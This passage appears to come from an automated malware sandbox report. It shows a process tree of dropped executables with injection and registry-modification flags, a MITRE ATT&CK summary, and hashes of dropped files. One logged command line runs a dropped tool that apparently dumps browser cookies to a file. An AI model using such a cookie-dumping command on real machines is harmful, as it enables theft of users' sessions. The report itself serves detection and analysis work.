                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5780
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2760
                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                          1⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • Modifies data under HKEY_USERS
                                                                                          • Modifies registry class
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2088
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                            2⤵
                                                                                            • Drops file in System32 directory
                                                                                            • Checks processor information in registry
                                                                                            • Modifies data under HKEY_USERS
                                                                                            • Modifies registry class
                                                                                            PID:2628
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                          1⤵
                                                                                          • Drops file in Windows directory
                                                                                          • Modifies Internet Explorer settings
                                                                                          • Modifies registry class
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:4804
                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                          1⤵
                                                                                          • Modifies Internet Explorer settings
                                                                                          PID:4848
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:5068
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies Internet Explorer settings
                                                                                          • Modifies registry class
                                                                                          PID:192
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                          1⤵
                                                                                          • Drops file in Windows directory
                                                                                          • Modifies registry class
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:5840
                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                          1⤵
                                                                                          • Modifies Internet Explorer settings
                                                                                          PID:5912
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:4256
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          PID:6068
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          PID:2248
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                            PID:4908
                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                            1⤵
                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                            PID:6100
                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                            1⤵
                                                                                            • Modifies registry class
                                                                                            PID:5512
                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                            1⤵
                                                                                            • Modifies registry class
                                                                                            PID:2408
                                                                                          • C:\Users\Admin\AppData\Local\Temp\81A.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\81A.exe
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            PID:6004
                                                                                          • C:\Users\Admin\AppData\Local\Temp\102A.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\102A.exe
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5200
                                                                                          • C:\Users\Admin\AppData\Local\Temp\1AF8.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\1AF8.exe
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5028
                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                            1⤵
                                                                                              PID:6140
                                                                                            • C:\Windows\explorer.exe
                                                                                              C:\Windows\explorer.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5080
                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                              1⤵
                                                                                                PID:1376
                                                                                              • C:\Windows\explorer.exe
                                                                                                C:\Windows\explorer.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:5088
                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Checks SCSI registry key(s)
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:5852
                                                                                              • C:\Windows\explorer.exe
                                                                                                C:\Windows\explorer.exe
                                                                                                1⤵
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:1252
                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                1⤵
                                                                                                  PID:4424
                                                                                                • C:\Windows\explorer.exe
                                                                                                  C:\Windows\explorer.exe
                                                                                                  1⤵
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:6016
                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:1940
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                    1⤵
                                                                                                      PID:4528
                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                      1⤵
                                                                                                        PID:2240
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        PID:4860

                                                                                                      Network

                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                      Persistence

                                                                                                      Registry Run Keys / Startup Folder

                                                                                                      1
                                                                                                      T1060

                                                                                                      BITS Jobs

                                                                                                      1
                                                                                                      T1197

                                                                                                      Defense Evasion

                                                                                                      Modify Registry

                                                                                                      3
                                                                                                      T1112

                                                                                                      BITS Jobs

                                                                                                      1
                                                                                                      T1197

                                                                                                      Install Root Certificate

                                                                                                      1
                                                                                                      T1130

                                                                                                      Credential Access

                                                                                                      Credentials in Files

                                                                                                      4
                                                                                                      T1081

                                                                                                      Discovery

                                                                                                      Software Discovery

                                                                                                      1
                                                                                                      T1518

                                                                                                      Query Registry

                                                                                                      4
                                                                                                      T1012

                                                                                                      System Information Discovery

                                                                                                      5
                                                                                                      T1082

                                                                                                      Security Software Discovery

                                                                                                      1
                                                                                                      T1063

                                                                                                      Peripheral Device Discovery

                                                                                                      1
                                                                                                      T1120

                                                                                                      Remote System Discovery

                                                                                                      1
                                                                                                      T1018

                                                                                                      Collection

                                                                                                      Data from Local System

                                                                                                      4
                                                                                                      T1005

                                                                                                      Command and Control

                                                                                                      Web Service

                                                                                                      1
                                                                                                      T1102

                                                                                                      Replay Monitor

                                                                                                      Loading Replay Monitor...

                                                                                                      Downloads

                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                        MD5

                                                                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                                                                        SHA1

                                                                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                        SHA256

                                                                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                        SHA512

                                                                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                        MD5

                                                                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                                                                        SHA1

                                                                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                        SHA256

                                                                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                        SHA512

                                                                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                      • C:\Program Files\Windows Portable Devices\PTTKASQBXH\ultramediaburner.exe
                                                                                                        MD5

                                                                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                        SHA1

                                                                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                                                                        SHA256

                                                                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                        SHA512

                                                                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                      • C:\Program Files\Windows Portable Devices\PTTKASQBXH\ultramediaburner.exe
                                                                                                        MD5

                                                                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                        SHA1

                                                                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                                                                        SHA256

                                                                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                        SHA512

                                                                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                      • C:\Program Files\install.dat
                                                                                                        MD5

                                                                                                        806c3221a013fec9530762750556c332

                                                                                                        SHA1

                                                                                                        36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                        SHA256

                                                                                                        9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                        SHA512

                                                                                                        56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                      • C:\Program Files\install.dat
                                                                                                        MD5

                                                                                                        31e4a5735b20be6a53cbb552663b1cc3

                                                                                                        SHA1

                                                                                                        c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                                                                        SHA256

                                                                                                        b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                                                                        SHA512

                                                                                                        3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                                                                      • C:\Program Files\install.dll
                                                                                                        MD5

                                                                                                        fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                        SHA1

                                                                                                        6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                        SHA256

                                                                                                        9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                        SHA512

                                                                                                        0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                      • C:\Program Files\install.dll
                                                                                                        MD5

                                                                                                        fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                        SHA1

                                                                                                        6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                        SHA256

                                                                                                        9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                        SHA512

                                                                                                        0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                      • C:\Program Files\libEGL.dll
                                                                                                        MD5

                                                                                                        cc0f81a657d6887e246f49151e60123d

                                                                                                        SHA1

                                                                                                        1eb31528501c375817853e09d95b7152858c5b31

                                                                                                        SHA256

                                                                                                        31fd8f7d1ab67c7b4f332d2d4518b99d2bb344ac577044b44551cd7e6f58dbbb

                                                                                                        SHA512

                                                                                                        8ad3af4b0fef41dc20965429fd4dbb699131e92277f14c8af5882970fd192820c0f0e1a8369dbc8471fcb09fe778fb708c57dfdfcacd14cd6e84a238fcc84198

                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                        MD5

                                                                                                        4c8fe6b2f96e01a5a6d418a7f1c843a7

                                                                                                        SHA1

                                                                                                        51842e81863c205e888bffe034a3abbf642c5419

                                                                                                        SHA256

                                                                                                        e6272d58a61f01f31f18f7b4ecc85232a1e71be4b9e93570395ad825e5ca6afa

                                                                                                        SHA512

                                                                                                        209986a1b77f039dac3c4e51a7c2a54af77b47261373e4f97290c8de21511dc181549ce656585c546ef616922aef5ee88f9d3cc98ae98e2b426dd4072688824a

                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                        MD5

                                                                                                        745db20fd3e289a001fd17d7e73c7b28

                                                                                                        SHA1

                                                                                                        6e99d180a44e0f9226672e9c5cfd796561f3e619

                                                                                                        SHA256

                                                                                                        d1e8b6205077152ab171194ebac11a5a6afa62be991643d99d7831412eea96c4

                                                                                                        SHA512

                                                                                                        8a33dcef7f679f12c34151b0dbacbe738d0d46c75e73f67a93d494117c04376ea3a52ffa5b8adf8b319b380f690b444d2fa1db8d195587bfe938a716869a7a42

                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                        MD5

                                                                                                        60f6b2c801a2a958b06c893b74b19282

                                                                                                        SHA1

                                                                                                        da0e286f2d50cc4f731f3fcec60de23069faf17f

                                                                                                        SHA256

                                                                                                        593de34d0c7012a797f118d197186c85f0bd1fd4d3a70fa84e3ea89f9f980032

                                                                                                        SHA512

                                                                                                        406ca703da00617705fbe0c5b9f6be656fffd3f43a8f68e6ccff78e24e5ef8b024f3f2dd1a28d63888abab10aacdab3a78bce0f2656e08b373e4ef8b0717833d

                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                        MD5

                                                                                                        9170385362b25b419d6cf14e7253ffb2

                                                                                                        SHA1

                                                                                                        c590d0c87b55159539d4c6d5e6eb77faf8dbadaf

                                                                                                        SHA256

                                                                                                        deda43d627b637c1bb1b3aeb4b25b2364bfc11516d415ab85d26b5140f4a3cf2

                                                                                                        SHA512

                                                                                                        568fa1621a9ab9d9fadd5ae6d5fd27223d0d8f0288989387660779cf81b9c26d5b8ce4498fb39268778a3f0e05f9897907573ef5a38a5e008e6b831483d03683

                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                        MD5

                                                                                                        614f12b4d2b4a7bf38bdf65b81f5d189

                                                                                                        SHA1

                                                                                                        7b2979451860d68078fed067b45c5da081deb0a8

                                                                                                        SHA256

                                                                                                        9f800baca515cb175b611b3351cb24b10b6f42e0e3c4db59b30bbacc5951e29c

                                                                                                        SHA512

                                                                                                        606dd92b1f071c371ed169f6a5acf6cced88cb22e99f17800e26f792156d146af824ab77275866fe95779689005933fea3f3d3e17aed1980eae2168eb8309fb1

                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                        MD5

                                                                                                        be73fabc24ee4cff33d56bb106252113

                                                                                                        SHA1

                                                                                                        b4fa6b5cbf425d8218f4c2450450d9fe1e5fdd33

                                                                                                        SHA256

                                                                                                        cb5c676c795efe1ef763c7f109175f339885b2379ceecd356ab9e4e5a5932355

                                                                                                        SHA512

                                                                                                        d3edad910e003a457fb2e979d27877cefaa295cfdd8d8ee5f62e86c5edbd7c47c0cb376ad32df4dbaaa5ea7f858196cc0fbed7061d7de86ec2d1c322bf5248f7

                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edb.log
                                                                                                        MD5

                                                                                                        ab015bf702b4815cf0b917d790a46f12

                                                                                                        SHA1

                                                                                                        977c2ca4273fe1bf8c65dbc6d49f1432663d225a

                                                                                                        SHA256

                                                                                                        077d6259dad422350de020980cac44c1d1c4aaeef3e4b00ccd1bef7864bc591c

                                                                                                        SHA512

                                                                                                        5381beefb4489c59cff8440cafcf6226f09c9c388dd2b1794c1e0d0f3794dce5bfa5e802f45e6f33f731d09b2060980445212c6410055013c9a95b2073561256

                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\edb.chk
                                                                                                        MD5

                                                                                                        1476372b6bcc39dd0f71a440b5f5a685

                                                                                                        SHA1

                                                                                                        0ebd4c6b3c78a3f9eede4cd39cda5436210c693d

                                                                                                        SHA256

                                                                                                        8573250c64dca11e79f5356155be1e1cf7b5770037ec7490836bd24c60c4bce8

                                                                                                        SHA512

                                                                                                        7381fded7a21521b5fbf67a177630a9f81d56971d12e8ef54e8c1536e2354053aa632a7c208c56300042d406a27b510c8a7357708d2fcb697449b3862bf37b59

                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb
                                                                                                        MD5

                                                                                                        dbe9b0132b66a81ec3507275b8a7e141

                                                                                                        SHA1

                                                                                                        9cbae99baa00148704b3080935cd191138f99ec1

                                                                                                        SHA256

                                                                                                        461bbbc5c89b96826534d1d3d2114f2c47f4bb79739ce031f79563454d105a92

                                                                                                        SHA512

                                                                                                        ab3e7797523d14f1a607a299493f59b9906b98decb21e96f6c67fab8aaf3a3e72ed867983b73611438a8d7cd1c42aec28cc3dfe1b9d9d58da91648d351dc1f29

                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.jfm
                                                                                                        MD5

                                                                                                        016e173f4b63e4075d42295f48955429

                                                                                                        SHA1

                                                                                                        ba69099f75a6aec359da30a86743e586a5b826f4

                                                                                                        SHA256

                                                                                                        b8d3873fd7cd736abab9ed3f86bca509806fe17f3aa07f8fa0f2cdff5a4fbcd6

                                                                                                        SHA512

                                                                                                        706f15015553b5808b87e39839e83c24f0ef2069307a50efa39b6f1882c16488fc3d4a9b80bb8e73665789abc30e5478f1f59f6358adb010d5254fc8ca3c9ad0

                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\Recovery\Active\RecoveryStore.{B5062377-D89E-4AED-AC05-3503BBAB1BB6}.dat
                                                                                                        MD5

                                                                                                        cdb5d8f89b99fccedf067419ba5f6cd8

                                                                                                        SHA1

                                                                                                        b16f5ccd53cdd52d235d607a149b6de4fc1e6b6f

                                                                                                        SHA256

                                                                                                        67ac83a32a7bd432fef315d1047c00f0d15ba45dd8acb82634901675c3ba6b63

                                                                                                        SHA512

                                                                                                        d456c8d65161c9a55775d6bb4cb07bc29dc374d6913a37d35d3d64682867fc5ef9edbb01b5a94bbc4fef5e81fc154f1200cadf337eb39852b441360539fec442

                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\Recovery\Active\{E19939B4-61E4-42C1-A301-FF4017E4E3A8}.dat
                                                                                                        MD5

                                                                                                        2bbd0bd5ab742d23a532a900d2abd57e

                                                                                                        SHA1

                                                                                                        88d03380929b2da6ae3e5c5523667ffde01d2c73

                                                                                                        SHA256

                                                                                                        727bd750321259beeb8ad2ad78c6b9a936d394e6ef5a3994ae65fd4f141a156f

                                                                                                        SHA512

                                                                                                        685d1a390a0843f5deb32d8559dd6a8ef3ecf7dd546c14479eb8622a292c582359c26cb11906e13f5f3f427c235f88837c57a7afd2015a00db47a73ad0e41db0

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\07-2217c-bea-4b3b6-41ce55c40d103\Kenessey.txt
                                                                                                        MD5

                                                                                                        97384261b8bbf966df16e5ad509922db

                                                                                                        SHA1

                                                                                                        2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                        SHA256

                                                                                                        9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                        SHA512

                                                                                                        b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\07-2217c-bea-4b3b6-41ce55c40d103\Pepyqarigu.exe
                                                                                                        MD5

                                                                                                        2e91d25073151415f8c39de2262cbba8

                                                                                                        SHA1

                                                                                                        32544481a34273a1a870822152d201ea9c19b34d

                                                                                                        SHA256

                                                                                                        0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                        SHA512

                                                                                                        306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\07-2217c-bea-4b3b6-41ce55c40d103\Pepyqarigu.exe
                                                                                                        MD5

                                                                                                        2e91d25073151415f8c39de2262cbba8

                                                                                                        SHA1

                                                                                                        32544481a34273a1a870822152d201ea9c19b34d

                                                                                                        SHA256

                                                                                                        0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                        SHA512

                                                                                                        306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\07-2217c-bea-4b3b6-41ce55c40d103\Pepyqarigu.exe.config
                                                                                                        MD5

                                                                                                        98d2687aec923f98c37f7cda8de0eb19

                                                                                                        SHA1

                                                                                                        f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                        SHA256

                                                                                                        8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                        SHA512

                                                                                                        95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\4oqehpxx.iao\google-game.exe
                                                                                                        MD5

                                                                                                        e27c391b1f65a77478fcab4d5e102cef

                                                                                                        SHA1

                                                                                                        44fa8a89ce66580e1561e0e6c72f9c440251522c

                                                                                                        SHA256

                                                                                                        2f4c3dd5cdc9982231f31e9fed7be3d8be472252fb1760c17e28c2c13514aed6

                                                                                                        SHA512

                                                                                                        0ffad244820443af18cc184131ab33437da6b957e9f41ddbf945a2e3d86d529c0b2fccdab069ff033c6d9d0bacab3843d55cd93b2353f9dfda892be48df608ff

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\4oqehpxx.iao\google-game.exe
                                                                                                        MD5

                                                                                                        e27c391b1f65a77478fcab4d5e102cef

                                                                                                        SHA1

                                                                                                        44fa8a89ce66580e1561e0e6c72f9c440251522c

                                                                                                        SHA256

                                                                                                        2f4c3dd5cdc9982231f31e9fed7be3d8be472252fb1760c17e28c2c13514aed6

                                                                                                        SHA512

                                                                                                        0ffad244820443af18cc184131ab33437da6b957e9f41ddbf945a2e3d86d529c0b2fccdab069ff033c6d9d0bacab3843d55cd93b2353f9dfda892be48df608ff

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                        MD5

                                                                                                        41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                        SHA1

                                                                                                        0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                        SHA256

                                                                                                        97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                        SHA512

                                                                                                        5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                        MD5

                                                                                                        41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                        SHA1

                                                                                                        0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                        SHA256

                                                                                                        97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                        SHA512

                                                                                                        5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                        MD5

                                                                                                        3b1b318df4d314a35dce9e8fd89e5121

                                                                                                        SHA1

                                                                                                        55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                        SHA256

                                                                                                        4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                        SHA512

                                                                                                        f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

